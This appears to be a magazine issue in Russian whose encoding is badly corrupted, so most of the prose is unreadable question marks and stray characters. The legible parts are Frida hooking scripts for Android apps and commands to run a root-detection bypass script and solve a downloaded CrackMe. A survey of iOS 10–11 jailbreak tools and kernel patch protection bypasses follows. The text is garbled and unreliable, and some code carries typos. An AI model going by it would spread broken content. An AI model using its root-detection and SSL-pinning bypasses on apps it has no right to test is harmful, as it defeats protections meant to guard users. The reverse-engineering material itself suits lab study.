$爁rida�U�l爀numerate.js爋rg.telegram.messenger
?� ?????� ??� ????�?� ????�??,� ???????�?� ???�????�??� ???�??� ????�??,
??????�??� ??� ???� ?� ?????� ??????� ???�???�??,� ??� ?????�?????� ????�????�
???� ?� ????�??�???� ????�?� ????�???�?� Android� (Android� ???�???�?� ????
????�????��??�??�??�???��?????燾opy?on?write).
??�????�???�??�???�??�??�?�??�?�???�????.�??�???�???�??�??
??,� ???� ?� ?????� ??� ????� ????�??� ???�?� ????�???� ????� ???,� ?� ????� ????� ????�
???��?????�???�???�?????�?????�?????�?�???�???�??.�??�??�???
????�??�????�??:
Java.perform(function�()爗
牋爒ar燗ctivity�燡ava.use("android.app.Activity");
牋燗ctivity.onResume.implementation�爁unction�()爗
牋牋牋燾onsole.log("onResume()爂ot燾alled!");
牋牋牋爐his.onResume();
牋爙;
});
???�???� ??� ??????�???� Java.use(),� ???�?� ????????� ???�???????�??
???� ??????� ?� ????�??� android.app.Activity.� ?????� ??� ??????�???�?� ???
?????爋nResume(),�??????��??�?�??�?????�??�????�(this.onResume).
??,� ???� ???�??� ?� ???�????�??� ???�???�??� ???� Android,� ???�??� ?????,� ???
?????燗ctivity�???�????�??�??�??�????牜????�??粻???�???�??.�?�??�?
???�??�??�??????,�???�?�??????�?????�???爋nResume().�?�????�???
???�??�??,�??????�?????�???�?�??�?�??�????�???�?,��??�?�??�???�
???�?�?�???.
??�?� ??� ???�?????� ???�??� ??????� ??� Frida,� ?????�???� ?????�??,� ?????
???�???� ??� ????,� ?????� ???�?� ?????�??,� ??� ????????,� ???� ???� ???�??� ????�
???�?��????�??��??�?????�????�???�???�?�???�????牜onResume()爂ot
called!�.
???�?�????�?�???�??�?�????�????�???????�??????�?�???�?:
Java.perform(function�()爗
牋燤ainActivity.onClick.implementation�爁unction�(v)爗
牋牋牋燾onsle.log('onClick');
牋牋牋爐his.onClick(v);
牋爙
});
?�??�??�??�?????�????�???燯RL,��??????�???�???�?�??�???�??:
Java.perform(function()爗
牋爒ar爃ttpclient�燡ava.use("com.squareup.okhttp.v_1_5_1.OkHttp
Client");
牋爃ttpclient.open.overload("java.net.URL").implementation��
function(url)爗
牋牋牋燾onsole.log("request爑rl:");
牋牋牋燾onsole.log(url.toString());
牋牋牋爎eturn爐his.open(url);
牋爙
});
?� ???�??� ???�??� ??� ????�???�?� ?� ?????� ???????�??� ???�????�?� OkHttp
?� ??????�???�?� ??� ?????� okHttpClient.open().� ??????�??� ???�??� ????
????.
Frida CodeShare
?� Frida� ????� ???�????�??� ??????�????� ?????�??,� ?� ???????� ???�?� ???�?
?????�????�????,�??爁ridantiroot��??�???????�?????,�??�???�???�?????�
????�??�??�?�?爎oot,� Universal燗ndroid燬SL燩inning燘ypass��????燬SL燩in?
ning,� Alert� On� MainActivity� ?� ???�??� ????,� ???????� ?????�???� ???�????�??
?????�????�???燗ndroid�?燡avaScript.
??�??�?�???�????�??�??�?�????�???�??�???�???????�???�??�????�
???��??????�????�????�?:
$爁rida�?codeshare燿zonerzy/fridantiroot�U�f燾om.example.vulnapp
??????燙RACKME
?�?????�????�??�???�?�???�???�?????�????�??.�?�???�????�???????�
??� ???�?� ???�?� ???�??�??� ???�??� CrackMe.� ????�??� ???�??� ?????�??�?.
???�??,� ???�??� ??� ????� ????�??????�??� ?� ???�??� ??????�????.� Crackme?
one.apk� ??????�???� ????� ?� ????� ???�??�??� ???????,� ?� ????� ??????� ?
????????�????�????�??�?�??�?.�??�?�??�?,�??�????�??�?�??�?�???�
?????�??�???�??�?�???�???�?????,�?��?�?�??�?�??�??????�??�??,
???�?�?????,�??�???????�燜rida.
????,�??�???�?��???�??�???�?�??�???�??:
$爓get爃ttps://www.dropbox.com/s/mrjnme2xiv45j4g/crackme?one.apk
$燼db爄nstall燾rackme?one.apk
???�???�???�?�?????�???�?�??�?????�??�?�???�???�?�????�??�???�
???�?.� ???�??�?,� ???�?� ????�???� ????� CrackMe,� ??� ???�??� ?????�?????
???????�??� ?� ??????� ??????� ???�?.� ??� ???� ???� ???�????� ??� ?????� ????
?????� ????�?.� ????�???�??� ???�???�??� ???� Android� ??????�???� ???� ??????
???�??� ????� ?????� java.io.OutputStream,� ????� ?????� java.io.Output?
StreamWriter.� ?� ???�???� ??� ???� ????� ?????� write(),� ???????� ?� ????�???
??�?????�??�?.�??�???�?????�???�??�?????�??�?�???�????�????
?�????�?�?�????�??�??�???�???,�??????�????�??�???�??�??�??�??,
????�???�?:
Java.perform(function�()爗
牋爒ar爋s�燡ava.use("java.io.OutputStreamWriter");
牋爋s.write.overload('java.lang.String',�'int',�'int').implem
entation�爁unction�(string,爋ff,爈en)爗
牋牋牋燾onsole.log(string)
牋牋牋爐his.write(string,爋ff,爈en);
牋爙;
});
??�??�???:
$爁rida�U�f燾om.reoky.crackme.challengeone�l爋utputstream_write.
js�?no?pause
??�??,�?�???�?�???�???�?�???�?
poorly?protected?secret
??�???�??�????�?:
1.�� ????� ???� ??� ??????�?????� ?????� overload(),� ???� ???� ?????� Output?
StreamWriter� ?????�???� ???�?� ???� ??????� write()� ?� ???�??� ???????� ?????�
???�??.
2.�?� ??????�?????� ?????� no璸ause,� ???????� ???�?,� ????� ??� ?????
?????�???� ?????�??� ?????� ???�???�??� ?� ???� ????� ??� ?????,� ???�?� Frida
????�???�?�??�???�??��????�?????.
3.�?� ?????� ????� ????�???� ????� Cra?kMe� ???�?� ????� ??,� ????�?� ?????�?
?� ???� ???�??�??� ???????� ?� ???�????� ????� (???� ???�????,� ???� ???� ?� ???
???????�??�???�???)�???�????�????�??????�??�???�??�(?????�????
?� ?????�??� ????).� ?????,� ????�?,� ????� ?????:� ????� ??� CrackMe� ???�??
????�?� ?� ?????�????�??� ????� ?� ???�????�????� ??� ????�?
?????� ???????,� ?????�??????� ????� ??� ???�????�?� (??,� ??� ????�??� ????
??� ???� ???,� ????� ??� ??� ??????� ??� ????� ???�??????� ?� ??� ???????� ??????
???�?????�?).
??�????�???�?�??�?�???���??????�????�?????�?
??????
Frida� ?� ?????� ???�??� ???�??�???,� ?� ???????� ??????�?� ???�?� ???�???
?�??????�??�??�???�???�???�????�?�??,�??�???�?.�?�??�??�??�???
??�??�???,�?�??�???�??�??燡avaScript,�?????�??�???�????�?????燗n?
droid� ?� ???�???�??� ???� ????.� ???� ???,� ????� ??� ???????� ??????????�?,� ????
????�???� ??????�???�???�?� ????�???�???�??�???� ???�??�??�???,� ????�
?????�?�?�???�?燜rida,�??�????燼ppmon.
?????
?????
?????????
???????????
???�???????營OS�,
???�??�?????
?�??�???????�????
?????�?????
????�?????
???????�?�????????
??????????????�???????
�????????�
aoleg@voicecallcentral.com
?�??�?�???�???�???�??�??????燝oogle燩roject燴ero�????�
???????� ???�??�?� ???� ???�????�?,� ???�???�??�???� ??� ????
???�???爄OS����?????�?�.1.2.�?�??????�?�???�???�
??� ???�????�???�??� ???�???????� ????�????�?.� ???�???�?
???????�???� ???�????� ??????�??� ????�?� ??????�???� ???
???�??� ?????�??�????� ???�????�?� (?� ???????�????�??
????�????�??)� ????�??� ????�?????�??� ?� ???� ???� ?????
????�????�?�??�???????�??�???�?�????�???�?.
???�??�????燝OOGLE?
?� ????�??�??� ????�????�????� ?� ???�?????� ????� ????� ?????�?� ?????�?.
??� ???�??� ???� ???�???� ??� ?� ???,� ???� ???�??� ???�??� ???�???�????� ???�??
??????� ???�??�?� ???????�?,� ?� ?� ???,� ?????� ????�?� ???�??� ???�????� ??� ????�
???�??�???�?.�????�??�????�?�??�?�????��????�??�????,��??�?�?
???????��???�??�?�??�???�????燗pple�??�???�????�?�??�????�???.
???�???�?????�???�?100�????�??�????�????,��??�?�????�??�????�?
???�????�?�??�??????�????�???�????.
?�??�?�??�?�???�???�?燝oogle��???�??�???燗pple.�?,燗pple�??�??
????????�???�?�?�??�???????�??�???�??�??爄Cloud�?�??�????燝oogle
(?????�??,爄Cloud��??�??????�???燗pple�??�??????�???????�??�????,
???�??�??????� Google,� Microsoft,� Amazon� ?� AT&T),� ?� ??,� Google� ?????�???
????� ????� ???� ??????�??� ???� ???????�???� iOS� ?� ??� ???� ??????� ??� ????�?
???�????� ???�???????� ???????�??� ??� ???�????�??,� ???�??�??� ?� ???????�
?????燝oogle燩roject燴ero.
???�?????� ???�??�??� ???�??????� (?� ???� ??� ???� ???�??�???�?)� ???�?
????�???�?� ???�????�??� ??????�????� Google� ?????� ?????.� ???�??????,
???�?????� tfp0� (???�???????� ??� task_for_pid(0)),� ???�?????� ?????�????�
????�???????�??????�??�??�???�????�??�???�??�?�???�??�???爄OS�,
??????�??�??�???爉acOS�爄OS�.0?11.1.2.
Google�???�???�?�??�????�?�燗pple,燗pple�????�???�??????�??爄OS
11.2,� ???????� ???�???� ???�??????.� ????�???�???� ???????�??� ?� ???
?�??????�???????�??�???�???�?????�?.
??�??� ???� ??� ???�???� Google� ???� ?????�??� ????�?????�?� ???� ????�???
????�?????�???,�??��???�??�???�???�????�????.�??�??�???�?????�?
???�?????,� ???� Google� ??????�???� ???�??� ???� ???�?� ???�??� ??� ??????� ?????�
?????,�??�??�?�???�????�???,�??�??�????�?�??�????�??��?燤icrosoft
???�????�?燝oogle燩roject燴ero�??�?????�?�??�?�???,�??燤icrosoft�????�
????�????�???�??�????.
??�???????�?� ???�???� ???� ???????� ?� ????�??�?� ????�??�??� ????�?????�
?????.�??,�?????�??�????�?�??�????�????�????�???�???�??�??�????�
?????�??,�???�?�?????�????�??????�??��???�?�??????�???�???????�
??????� Cydia� (???�?????� ?� ????� ????????� ?????).� ????� ???�??� (saurik)
?� ????????� ???�????�?� ?????�??�?� ???????�?� ???� ?� ????�???� ???�????
?????�???� ?????� ????�????�?� ??� ????�?� ??????�?� ????� (??????�?� ?� ????�
????????!),�??���??�????�????,�??�???�???燙ydia.
???� ??� ?????� ??????� ??� ???� ??� ????,� ??� ????�????�?� ????.� ?????� ????�
??????,� ???� ??� ????�??�?????� ?� ???� ???� ????�???�?� ???�?� ?????.� ??� ?????�
??��??�?????�?�??�??????�?��??�???�?�???�?.
??????????��??????????
??�??????�???�????�?�??�?�?�??�???�???�???�??�???,�??????�??�??
????�?????� ????�??�?� ????�????�?.� ???�?� ???,� ????� ??????� ???�??� ??� ???,
???�????,�???�??�??�?�????????�?????�???�?�????�??�?????�??�??
iOS��??�??�??�?????�??�??.
????,�??�??�?�??�?????�????�??,�??�?????�?�???�???�?????�????
????�?�??�??�??�??�????�???�????�??�??�??�?????爄Tunes.�???�
??????�?� ?????� ??????� ??� ?????�???� ?????:� ????� ????� ??� ??� ???,� ????
�?????� ????�???�,� ???????� ??????� ??� ??????� ???�????� ????� ???�??�?????
???�??�??���??�??�?��??�????�??�?????�?�???�?�??�??爇eychain,
???� ??� ???????� ??????�???,� ???� ?� ??� ???�??� iPhone� ???� iPad.� ?� ???� ????� ??
??????� ??� ????�?????,� ??� ???� ???�?� ?� ??????� ?????� ?????�?????
???�?????�???�??�???�??�?,��?????�???�???�??�??�?????�????�?????�
????� ?????� ?� ???�??� ???�??� ??� ???�???� ????�?� ??� ???� ??� ?????� ???????
???� ????�??,� ?� ??????�?� ???�????� ?????�???� ?????.� ????� ??????� ???�??
??� ???,� ??� ????�?� ???�???� ???�??�?????� ???????� ??� ??????� ????�????�?
?�??�?�???,�??��?�???�????�?.
?�??�??�?????�??�?燬HSH2�???,��?????�??,�?�???�??:燗pple�????�
??????� ???�???????� ???� ???�??�?,� ???� ???????� ???�????� ????�????�?.
?????�????��??�??爄Phone�??�,�??�?????�?�??�????�(?�?�??�??
???�?????�???)爄OS�.3.3.
?????????
???�????�???�????�?,�???�??�??�?�???�????�??�燝oogle燩roject燴ero
???�????�?,�???�??�???�???�????�????�??�???�?.�???�??,��??�?????�
???�???� ????�????�?� Yalu� ????�??�???�???� ???�?� ???� ??.� ????????� ?????
????�??.
1.�??�???�?� IPA?????� ????�????�?� (????�?� ?� ????)� ?� ???�???�??� Cydia
Impactor.
2.�??�??�???� iPhone� ?� ?????�??�?� ?� ????�??�???�?� ??????�???�??� ?????�
?????,� ???�???�??� ???�??� 玊rust� this� computer?粻 (????�?� ???�????:
???爄OS��?�???�??�?�??�???�???�???�?�?????�??�????�?�??????�
?????�??爄OS��?????�?�??�???�?).
3.�?�??�???燙ydia營mpactor��??????�???�?�?�???營PA?????�???�????�?.
4.燙ydia� Impactor� ???�????� Apple� ID� ?� ??????.� ???�??� Apple� ID� ?� ??????
??�????�???????�???�??�?????燗pple�(????�?,�??�????�??�?�??????�
??????�????,�???�?�??�??�?????�???�??).
5.營PA?????�????�??�????�(???�??????�??�???�?�??�?�???�???!)��???�
?????� ?� ??????�???.� ??� ????� ???� ??� ????� ???� ????� ???�?� ?????�???� ????,
????�??�?�????�??�???�???,�??�?�?????�??�??�????�??�???.
6.�??�?� ???�???�???� ???????�????� ???�????� ???�???,� ???????� ??� ????�
?????� IPA?????� ?� ??????� ???� ???�????� ??� ??????�???,� ???�?� ?� ???�???�?
Settings�燝eneral�燩ro?les�燩ro?les�&燚evice爉anagement�(????��???�
????� ????�??�??� ???�???� ????,� ??� �??�???�?� ?� ????????� ?� ???�???�
???牜???�???��??????�??�?????�????�).
??�???� ???�????:� ???� ????� ???�?� ???�???�???� ???????�??� ???�??� ????�
??????�?,� ????� ???�??�?� ???�?????� ??????�?� ???�?� ?� ????????� (???
???????��???�?????�????�????��??�????爌pq.apple.com).�??�????
???�???�?�??�???�????.
7.�???�?�??�?�??�?�?�??�???�??????�????�???�??�???�?????.�???
???�???�??�??????,�??????�????�???�??��?�???????�??�??��???�
?????�??�???�?????�???.
????�?????� ?????� ????????� ??� ???�???�???� ????�????�?.� ???????� (?� ????�
????????�?????)燙ydia,�??�??�??燙ydia燬ubstrate,�??�???????�???�????
????,� ?????� ??????� ??� ?????�?� ?????�????�??� ???�???�??� ?� ???� ???� ????
?????�??�???�??�???,��????��?�??�???�??�???��??�??�??�????.
??�??� ???� ????� ????�????�??� ?� ???� ????�????�??� ???�?� ??� ??????.
???�?�??�??�??????�????�?????�???�???�??�??�?�?????�????�???�???�
????�???�????�?�?�????�?????�???,��??��???�???��??�?????�???
???�???�?????�????�???,�??�???�??�????�??�?????�??�?????�?�?????�
?????.� ?????�????� ?� ???????� ???????�??�????�???� ????�???� ???� ???�?????�
?????� ???� ???�??????�???� ????�???� ?� ????�???�??�???� Apple� ID?� ????�??,
??????�?????� ?????� ????�???� ???� ???�???� ????�????�?� ?� ????� ???�????�?
???�????�??.
???????�??�?????營OS�?11.1.2
????,� ?????� ????�????�?� ??� ????�?� ???�??�??� ???�????�?� ????� ??� ???�??
???????� ??� ??????�?� ???�?,� ??� ?????�??� ??� ???� ?� ???�????� ???�???.� ???
???�?�???�???:
? h3lix�(iOS�.0?10.3.3,�?bit)?
? Meridian�(iOS�.0?10.3.3,�?bit)?
? g0blin�(iOS�.3.x,�?bit,燗7?A9爋nly)?
? LiberIOS�(iOS�.0?11.1.2)?
? Electra�(iOS�.0?11.1.2).
h3lix:爄OS��??�-???�?????�?????�??
h3lix� ?� ?????�??� ????�??�?????� ??????� ??????�??� ????�????�??.� ??� ????�
?????�???� ???� 32????�??� ??????�???,� ??????�???� ???� ???????�???� ????
???�??爄OS�.�???�??�??爄Phone��,��??�?�????�??爄Pad�爄Pod燭ouch.
???�????�???� ????�???� ?� ???�??� ????�????�?� Cydia,� ???� ???� ????�?????
?� ????�??�??� ?????�????�??� ???�???�??� ??� ???�???�?.� ???�??� ????�??
?�???�???�????�??�?�?�???�???�?,�????�?�????�??????�?????�??
???�????�????�?????�?????�??�?�???�??�???爄OS�.
Meridian:爄OS��??�-???�??�?????�??
????�?????� Meridian� ???????� ????�???� 64????�?????� ??????�???� (iPhone
5s�爄Phone燲,��??�?�???�???爄Pad�???�???�??�???�?????�??),�??????�
????�?�????�??�??爄OS.��????�??�?????�??�??�??�???�?????�???�
???�?�????�?????�?�??�?????,�??�??,�???�???�??????�?????�?�?爄OS
10.2.1�??�????�??�??,�??�?�?????�??燳alu�??燬aigon.燙ydia�???��???�
????�??�??�???�??�?�??????�??�???�??�?????�??,�?�?????�?????爀x?
tract燿pkg�??�?�??�?�???�????�?.
g0blin:爄OS�.3.x,�-???,�???�?�??�?????�??�?燗7?A9
????�????� ?� ???�??� ???�????� ????�????�??� ???�?� ???�???� g0blin,� ???????
?????� ????�???� ????�????�??� ???�?� ???�??????� ??????�??� ?� ???�??� iOS.
?� ???�???�?,� ???�????�???�?� ??????� ??� iPhone� 5s� ??� iPhone� 7/Plus� ?????�
??????�?,� ?� ???�?� ????�???� iPad,� ????�???�????�??� ???�??�?????� ???????�
???� A7,� A8� ?� A9.� ????�???�?� ?� ???�????�?????� ???�??� iOS:� ????�?????
??????�?�???�?�?爄OS�.3?10.3.3.
???� ????� ?????� ?????� ???????�????�???�??�??� ????�?????,� ????� ????
h3lix?� G0blin� ??????�?� ????� ?????� ???�???�?,� ??� ???�?� ???�?????� ?� ????
??????�???�?��??�????爄OS,�??????��??�??�????�???�?.��??�??�???�
???�(RC1)�???�????�?�??�??�??�??燬SH�(dropbear)?�?�??�??�(RC2)燬SH
??�???�??,�燨penSSH�??�?�???�??�?????�?????�?�?燙ydia.
iOS�.0?11.2:燣iberIOS�燛lectra
???� iOS� 11� ?????�??�?� ??� ????�??� ????� ???� ???????� ????�????�?:� LiberIOS
?� Electra.� ???� ????�????�?� ??????�???� ????� ?� ???� ??� ???,� ????�?� ???�???
???�????�????�???�???�?.
???,� ???�????�??� LiberIOS� ????�?� ???????�?� ????�??�?� ?� Cydia.� Cydia
??� ????�???� (?� ??� ?????� ????�???)� ?� ???�??� ???�???,� ?� ??????�?????� ?????�
??????�??�?�??�?�??��??�?�????�???�???�???�????.
?�??�??�????�??燛lectra�???�??��??�??�???�????�?�??�??�??燬SH,
???� ?� ???????� ???�???�??� Cydia.� ????�?� ????� ????�?????� ??� ???????�???
?�?????�??????.
???�??�????�???�????�?爄OS�
?� ???�????� ???� ????�?� iOS� 11� ???�???�???� ?????� ???�??,� ???�?????� KPP?
less.� KPP� (Kernel� Patch� Protection)� ?� ????????� ???�??�?� ?????�???�?� ????,
????�??� ??????�????�??� Apple� ?� iOS� 9.� ????� ????????� ???�???�?� ??????�
??????� ????� ???�???� ???� ?� ???�??�?� ???�????,� ???� ?� ??� ???�?� ??????.� ????�
???�????� ???????�?� KPP� ?� ???,� ???� ???�??�??� ???�??�?� ?????� ????� ????�
????�?� ?� ???�??�??� ??????� ???�???.� ????� ??� ????�????� ??????�???,
?� ???????� ????�?� KPP� ????�????� ????�????� ?� ????� ???�???� ?� ???????
????�?� ???????�????�?.� KPP� ???� ???�??????� Apple� ?� ???�??� ???�???
???� ??????� ??� ????�????�?,� ??� ?� ???�??� ????�????�?� ????� ??� ????� ?????
??????�(??�???�??�???��?????).
?� ????�????�??� ????�????�??� ????????� KPP� ???�?????� ?????�???.� ????
???�??� ???�???� KPP� bypass?� ????�?� ??� ??????�???�?� ?� ????�????�??� Pangu
?燳alu.
?� ????�????�??� iOS� 11,� ????�??�??� ??� ?????� ???�????�?,� ???�????�???
??????� ????�?� KPP� ???�??� ???�????.� ??????� ????�?� ????,� ???�?� ???????�
????�???� ????,� ????�?????� ??????�???�?� ???�??� ???�?� ???�???� ?� ??,
???????� ??� ???�???�???� ???????�??� KPP.� ??,� ???�?� ??� ????�?� Apple
????????�??�??�?��???�???????�??�????�??�???��??�??�??�???????�
???爄OS��?�???�???�???�牜?????��??�??�!
??�??�????�????��?????�??�????�?�??�???�???�????�??????�?燙y?
dia� Substrate,� ???????� ??????�???� ??� ??????�???� ???�????� KPP.� ??� ??????�
??????� ????� ?????�???�??� ????�?????,� ?????�????�??� ???�??�??� Cydia
??爄OS�,�燛lectra.
??�?�???�???�?????�??�???????燢PP��??�???,�?????�?�??�???�??
???�????�???�??�??�??�???�????�?,��???�???:燞ow燢ernel燩atch燩rotec?
tion燱orks燼nd燞ow燞ackers燘ypass燢PP.
???????????�?????
????� ?� ????:� ????�??�?� ????�????�?� ?� ???�???� ?????� ???�???�?� ?????�
???????.� ???� ??� ???�??,� ???� ??� ??� ???�???� ???�??�?????� ??????�???� ?????
iTunes� ???� ????�???� ???� ?� ?????�???� ???�???�??.� ????�??,� ???�???�?
?????�???�?,�??�??�???�??��??��??�??�??�??.
??�??�??,� ??� ????�????� ????�?????� ??� ???????� ?� iOS� 11.1.2.� ?????
????????� ???�?� ???????�????� ?� ??????�???� ?????�????�??� ????�?� ???�???
?�???�????,�???�???�???�?????�?�?????�????.�????��???�???�????�
?????
??????�??,� ??� ??????� ???�???????� ????�???� ???????� ?� ?????�???� ????�
????�??.�???�??�??�????�??�???,�?�??�?�???�????�?�(?�??�????�
?� ??????�??� ???�??)� ???� ???�?� ?????� ??????�?� ?� ???�???,� ???�???� ?� ?????�
??????� ???�?????�??�?� ??� ??????� ?� ?????� ?????�?????� ???�??�???� ?????�
???�?� ???????????�??.� ?????� ????�??,� ?????� ?� ?????�???� ???�???�??
?????�?????,�?�?�??�?�?????�???�???�????�???�???.
???�?????�??燗pple�???�?�??�?�?????�?????�??�??�??�????�??????�
????�????爄Tunes.��???�??�??�??�???�?�??�?????�??�??爄OS��???�???�
???�??�??�?,�??????��????�???�??�???��??????.
?� ????� ??� ??� ??????�??�?� ????�??�?????� ???�?????� ???�??� iOS,
???�??????�????��?�????�??�???�???�????�??�???�?�?????�?????�?
??�??�????�??�??,�?�??????�?�??�??�?????
??�??� ???� ???� ?????????� ???�?????� ????�???,� ?????�?� ?????�??,
???� ??????�?� ???????�??� (???� ????�???�??�?)� iOS.� ???� ????� ???�?� iPhone
????� ????�?????� ???�??�?,� ???� ???�???�???� ???�???�?� ?� ???�????� Apple
?� ????????� ???�????� ???�???.� ???� ???�????� ???�???� ?????� ???�???�???�?
????�?�??�??�???�???�????�??�?�?????�???��???�?�??�??�???�??�???�
???爄OS.
???�?????,�????�??�??�?��????�燗pple.�???�??�??�??�????�????�
???�?� ???�???????� ??� ???� ????� ???�??� ???�??�?,� ????�?????� ??� ?� ????
???????� ???� ????�??� ??� ??� ???�???.� ????� ????????� ??� iOS� 11,� Apple� ???�?
????�?????� ???�???????� ???�?????� ???�??� 11.1.2,� ???� ???????� ??????�?
????�?????.�????�???�??,�??�?????�???�??�??????�?�??�???�???�
???�?????�??????�???�?�?�??????�(????�?��???�?????�??)�??�??爄OS,
???????燗pple�??�?????�?��??�?????�?????.
??�?� ??� Apple� ???�??� ???�?????�?� iOS� 11.1.2,� ??� ??� ????� ??� ???�?????
???�?燬HSH2�?� ???�???�??��DA�??�????�?�??�????�?????�????�??
???�???�??.�?????�??�??�?燬HSH2,�?�???�?��????�?????��??????
???�??�?????�???爄Phone�?�??�??�??�??�???.�??,�?�??�??????�??�??
???�????�???��?????,�??�?燗pple�??�??�?????�?�??�??�??�??爄OS.
?� ???� ??� ?????,� ?????� ????!� ????�?� ???�??� SHSH2� ??� ??????� ????�
????????�??�?????�???�??�??�????�??�????�??�???燗PFS�??�?�??�?
????�????�?.� ?� ???�??� ?� ????�??� Electra� ???�??� ????�??� ???�????� ????�
?????�??�???�??�???�?��??�??�?�???�?�?????�???.�??�??�????�????
APFS�??�?�???�????�?,�?�??�???�???�???�?��?????�?�??????�?????�
???�????�??�???.
???�???�?�??�???�???,�??�?牜?????燗PFS粻?�??�?�??�???�??
????�?????�?,� ???�??????� ?� ???�??�????�?� ?????�????� ???�????� ????�
????燗pple�(APFS),�?????�?,�??�???�??��??�?????�??�?�??�?,�??????
???�???�???��???????�?????�?.�??�?�??.�??�??�??�??�???�?�???�???
APFS� ????�???� �????� ???�??�??�????粻 Windows,� ???�?� ???????� ???�?
?�?????牜??????�??�???�.
???� ???� ??????�?� Electra� ?� ???�?� ?????�??� ???�??� (??�????�??� ??????�
????�???�?�?燙oolstar,�??�????�???�???�????�?燛lectra):
1.�?�??�??�??�???�???�?????�???,燛lectra�??�????�??�?????�??�????
???�???� ??????�???� (????� ???� ????�??�??� ???�??� ????�?????� ???� ????�
???�??�??�??,�??�??�?�?�????�???�???).
2.�?�?�??�????�??�???�??�??�?�牜???�????�?�??�??粻???�?????�(?????�
??????� ????�??�???�???� ??� ???�??� ???�???,� ???� ????� ????�??�???� ????
??� ????�???????�??� ???�??� Electra� ?� ???� ???�??,� ??????�???�???� ????�
??????�??�??),�????�??�??�???�??�??�????�??�????�??�???燗PFS.
3.�?�?� ??� ???� ????�??�??� ???�??� ????�?????� ???� ????�???�?� ???�??
?????�????�?�???�??�?????�????�??�????�??�???,燛lectra�??�????
???�??????�??�?�??�??�????�??�???�?�???�?.
??�????,� ????�??� ???�??!� ?� ???� ???�??�?????� ???�??� ??� ??� ???�?� ????�?,
?� ????�?� ???�???� �???�?�,� ???????�??� ??� ????�????�??� ??� ????� ???�?� ?
?????�??�??�??�?????:�??�??�??�??�???�(???�??�????�燬emiRestore11)
????�?�????,�?燙oolstar�??�???�????�???�??��??�??�??�??�?.
?� ???????� ??� ???�???� ???�???�?????�?� ????� ???�????,� ??� ?� ?????� ????�
???�??:� ???�??�??�??� ?????� ????�??� ??� ???�?????� ??� ??????� �??�?� ???�?
????�?�,�?�???�?????�????�??�????�??�???,�??�??�??�?�??�?�????�
???�?�???�????�?,�?�????�??�??�??�???.
???�?�??�?????�??�???�??�?�???�????�?,�???�??�?�????�???�???
??????�???��????�???�??�???�??�(Reset�燛rase燼ll燙ontents燼nd燬ettings).
???�???�?�????�??�???�??�??�??�?� /var,��?�???????�??�??�??�??
???�???�(iOS�.0?11.1.2).
??�??�??�?????�??�?�???�?�????.�???�?????�?�??�???�??�????
SemiRestore�??�???�??�??�?????�??�???�?,�??�??�???�???�??�??�??,
??????�????�?�?�??????�???�?.
???�??�????�??�???
??�????� ???�????�?,� ???�???�???� ????????� ???�?� ?????�???�?????�?,� ?
???�???�???.�?�??�?�????�?�??�??�??�??????�爄OS�??�???�???�????�
??????�??
??�??� ???�?????.� ???� ????� ???�?� ???�???�?????�?� ???�???????� ?� ?????�
????�?????�???,�??�?�??�?????�??�?????�??�??�??,�??�?????�??�???�
????�??�??�????�??????��???�?��??�??�???�???�??????��???�?????
???????�??� ?????�????� ?� ?????�??�??.� ???� ????�??�????� ???????�???
?????�????� ?� iOS� 11� ???�???�???� ??� ????�?� ???�??�???�???� ???????,� ??� ?
????�?�?????�??�????�?.��???�???????�?????�??�????�?,�?�???�???�
???� ???�????�??� ???�?� ???�???� ?????�???� ?????� ??????�?� (????�??� ???
??????� ??� ???�??�?� ?� ???�????,� ??????� ??� ????�??�??� ?????� ????,� ???�??
???�?,� ???????)?� ????� ??� ?????�???� ?????� ????� ??????�?� ???????,� ??� ???
???�?� ????�???� ???�???�?� ?� ????� ???�??.� ???� ??????� ??????� ???�????�?
???�?� ????�???� ???� ????�???� ??????� ??� iCloud,� ???�?????�???� ???� ???�???
???�??� ??� ????� ??????�??,� ???????�??�????�??� ?� ???� ??� ????�??� ??????
Apple?� ???????,� ???�?� ???�?� ????�???� ???????� ??� iCloud,� ??� ????� ??????
??燗pple營D.�??�??�?�??�??�???�?��?????牜???�??�?�??�???�爄Phone,
????� ???�???.� ???� ???�???� ???�??,� ???�??� iCloud� ?� ???�???�?� ??????�??
??????�???�.
???�????�????�?????�??�???�????�???�???�???�????�??�??�??�???�
????????� ????� ????????� ??� ????�??� ????�?????�?,� ??,� ???????,� ???????.
?????�???:�???�??�???�???????,�??�??�??�?,�????�?��??�?�???�????�
??:� ???� ???�???�??� ?� App� Store� ??????�???�?,� ?� ????�????,� ???�??�???�
??????�??�??�??�??????,�???�?�??�??�??.
????�????�??� ?????� ???�???�?????�?� ???????� ???� ????,� ???�?� ???????
?????�?????�??� ???????�??� ??� ??????�???� (???????�??� ?????�????� ????�
???,� ?� ???�???,� ???� ??????� Elcomsoft� iOS� Forensic� Toolkit).� ???�?????
???�?????��?,�?�???�?��???�?????�???�???�?????��??,�??�??�?
???????�?�???�??�????�???�????�(?�??????),�?�??????�??�????�????
???�??�???�??�??��??�??�??�???�???�?�???�???�??�??�?,�??�?????
?????� ?� ???�?????� ????�??� ???�?????�????� ??????�???.� ???�?� ????????
???�??��????�????�??�???�??��??�????,�??�??�???�?????�??????�?
?燭elegram,燱hatsApp�??燜acebook燤essenger.�??�?�???�??????�??�???�
???� ???�?� ???�??�?.� ???� ???????,� ?????�????,� ?????�??� ???????�??,
??�??�?�?�??�????�???�?????,�??�????�??�??�??�??爄OS��???�?????�
??�??�(?�????�????�??�??��????�??�??�?�??�???�??�??�????),�?
????�?????� iOS� 11� ???�????�?� ???�??� ????�???�??????�????�????,� ????�
??????�??�?�??????�????��??????.
WWW
??�?� ????� ????�?????�???� ????� ????�????�??
???�??� ???�??� iOS� ?� ???�?� ??????�???� ??� ????�
??????�????�?:
?Jailbreak� update:� a� summary� of� current� tools.
?????� ???�????� ?????�???� ???�??�????
?????�????�??�?????燢PP?less�???�????�???
???????�???� ????�???� Cydia� Substrate
?�?????�???�?�??????燬ubstitute.
?Electra� jailbreak� for� iOS� 11.0?11.1.2.� ?� ????
??????�??�???�??�??�????�??�???�???�????�
?????�?� ?� Electra,� ????�??�???� ?????� ?????
???�??�?????� (KPP?less,� ???�??�??� Cydia,
????�??燗PFS).
??????????
??� ???�???�???� ???� ???�??� ???� ????�????�?� ????�??�??� ?� ????�????,
??????�???� ???� ???????�???� iOS� 10� ?� 11� (??� ???�??� 11.1.2).� ????�??� ??
????�????� ??????�?� ???�???�???�??� ????�??.� ???�???�?� ??� ???�???�?
Google,�??�????�??????�??�?�??�????�??��??�??????,�?�???,�??????
???� ???� ????�?� ??????�???� ?� ????� ??� ???�?????� ????�?????�???� ???�??
??�??�?�?????.
???????????
????? ?????
ANDROID 9
